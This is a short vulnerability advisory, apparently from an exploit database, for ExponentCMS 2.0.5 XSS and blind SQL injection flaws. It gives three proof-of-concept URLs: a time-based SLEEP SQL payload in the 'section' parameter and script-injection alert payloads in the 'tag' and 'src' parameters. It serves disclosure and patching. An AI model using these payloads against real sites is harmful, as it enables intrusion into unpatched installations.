vendor:
ExponentCMS
by:
Onur Yılmaz
9
CVSS
CRITICAL
Cross-Site Scripting and SQL Injection
79, 89
CWE
Product Name: ExponentCMS
Affected Version From: 2.0.5
Affected Version To: 2.0.5
Patch Exists: YES
Related CWE: N/A
CPE: a:exponentcms:exponentcms:2.0.5
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012
XSS and Blind SQL Injection Vulnerabilities in ExponentCMS
Exponent CMS is affected by XSS and SQL Injection vulnerabilities in version 2.0.5. Example PoC urls are as follows : http://example.com/index.php?section=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A) http://example.com/index.php?action=showall_by_tags&tag=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E&controller=news&src= () random4e5433b85bb1f http://example.com/index.php?controller=expTag&action=show&title=changes&src=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
Mitigation:
The vendor fixed this vulnerability in the new version. Please see the references.